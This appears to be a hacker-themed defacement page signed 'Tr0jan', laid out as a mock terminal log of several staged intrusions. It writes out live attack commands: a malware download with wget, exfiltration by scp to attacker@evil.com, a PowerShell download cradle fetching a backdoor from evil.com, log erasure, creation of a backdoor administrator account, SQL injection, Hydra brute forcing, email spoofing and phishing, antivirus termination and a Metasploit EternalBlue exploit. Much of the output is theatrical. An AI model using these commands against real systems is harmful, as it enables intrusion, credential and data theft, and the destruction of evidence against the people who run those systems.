Initializing hacking sequence...
Scanning target IP: 192.168.1.1
Port 22 open - SSH detected
Attempting brute force on SSH...
Password cracked: admin123
Gaining shell access...
> whoami
root
> ls /var/www
index.html config.php
> cat /var/www/config.php
DB_HOST=localhost
DB_USER=admin
DB_PASS=secretpass
> mysql -u admin -p secretpass -e "SELECT * FROM users;"
id | username | password
1 | user1 | hashedpass1
2 | user2 | hashedpass2
> wget http://malicious.site/malware.sh
Downloading malware...
Executing payload...
Rootkit installed.
Covering tracks...
> rm -rf /var/log/*
Logs erased.
> echo "Hacked by Tr0jan" > /var/www/index.html
>>>>>>>>>>>> I crack your heart Aoimir <<<<<<<<<<<<
Site defaced.
Exfiltrating data...
> scp -r /var/www/* attacker@evil.com:/data
Transfer complete.
Disconnecting...
Session ended.
Initializing hacking sequence...
Scanning target IP: 10.0.0.1
Port 80 open - HTTP detected
Exploiting SQL injection...
Payload: ' OR 1=1 --
Database dumped.
> nmap -sV -p- target.com
Starting Nmap...
Port 443 open - HTTPS
Port 3389 open - RDP
Attempting RDP exploit...
BlueKeep vulnerability found.
Exploiting...
Remote desktop access granted.
> dir C:\Users
Administrator
Guest
User
> type C:\Users\User\Desktop\secrets.txt
Bank account: 123456789
Password: qwerty
> net user hacker password /add
User added.
> net localgroup administrators hacker /add
Admin privileges granted.
Installing backdoor...
> powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/backdoor.ps1')"
Backdoor active.
Covering tracks...
> wevtutil cl System
Event logs cleared.
> shutdown /r /t 0
Rebooting target...
Hack complete.
Initializing hacking sequence...
Scanning target IP: 172.16.0.1
Port 21 open - FTP detected
Anonymous login successful
> ftp> ls
226 Transfer complete.
> ftp> get sensitive_data.zip
226 Transfer complete.
Unzipping...
> unzip sensitive_data.zip
Archive: sensitive_data.zip
extracting: passwords.txt
extracting: credit_cards.csv
> cat passwords.txt
admin:password1
user:password2
> head -10 credit_cards.csv
4111111111111111,John Doe,12/25
4222222222222222,Jane Smith,01/26
> rm sensitive_data.zip
Evidence removed.
Initializing hacking sequence...
Scanning target IP: 203.0.113.1
Port 25 open - SMTP detected
Spoofing email...
From: boss@company.com
To: employee@company.com
Subject: Urgent: Update Credentials
Body: Click here to update: http://phishing.site
Email sent.
Phishing campaign initiated.
Monitoring responses...
Credentials harvested: 5
> hydra -l admin -P rockyou.txt smtp.company.com smtp
Hydra starting...
[25][smtp] host: smtp.company.com login: admin password: letmein
1 of 1 target successfully completed, 1 valid password found
Access gained.
> telnet smtp.company.com 25
Trying 203.0.113.1...
Connected to smtp.company.com.
Escape character is '^]'.
220 smtp.company.com ESMTP Postfix
> HELO evil.com
250 smtp.company.com
> MAIL FROM:
250 2.1.0 Ok
> RCPT TO:
250 2.1.5 Ok
> DATA
354 End data with .
Subject: You've won a prize!
Click here: http://malware.link
.
250 2.0.0 Ok: queued as 12345
> QUIT
221 2.0.0 Bye
Spam sent.
Initializing hacking sequence...
Scanning target IP: 198.51.100.1
Port 53 open - DNS detected
Poisoning DNS cache...
Redirecting bank.com to fakebank.com
> dig @198.51.100.1 bank.com
;; ANSWER SECTION:
bank.com. 3600 IN A 203.0.113.195
Cache poisoned.
Victims redirected to phishing site.
> metasploit
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set RHOSTS 198.51.100.1
RHOSTS => 198.51.100.1
msf exploit(ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] 198.51.100.1:445 - Connecting to target for exploitation.
[+] 198.51.100.1:445 - Connection established for exploitation.
[+] 198.51.100.1:445 - Target OS: Windows 7 Professional 7601 Service Pack 1
[*] 198.51.100.1:445 - Core module executing cmd.exe...
[*] 198.51.100.1:445 - Reading from connection #1...
[+] 198.51.100.1:445 - ===============================
[+] 198.51.100.1:445 - ETERNALBLUE OVERFLOW
[+] 198.51.100.1:445 - ===============================
[*] 198.51.100.1:445 - Sending stage (179779 bytes) to 198.51.100.1
[*] 198.51.100.1:445 - Meterpreter session 1 opened (192.168.1.100:4444 -> 198.51.100.1:49229) at 2023-01-01 00:00:00 +0000
meterpreter > sysinfo
Computer : WIN7PRO
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > shell
Process 1234 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> dir
Volume in drive C has no label.
Volume Serial Number is 1234-5678
Directory of C:\Windows\system32
01/01/2023 00:00 .
01/01/2023 00:00 ..
01/01/2023 00:00 1,234 config.sys
> netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 123
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 456
> taskkill /f /im antivirus.exe
SUCCESS: The process "antivirus.exe" with PID 789 has been terminated.
> echo "Hacked by Tr0jan" > C:\Users\Public\Desktop\message.txt
File created.
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 198.51.100.1 - Meterpreter session 1 closed.
Hack complete.
The site will be available soon
by Tr0jan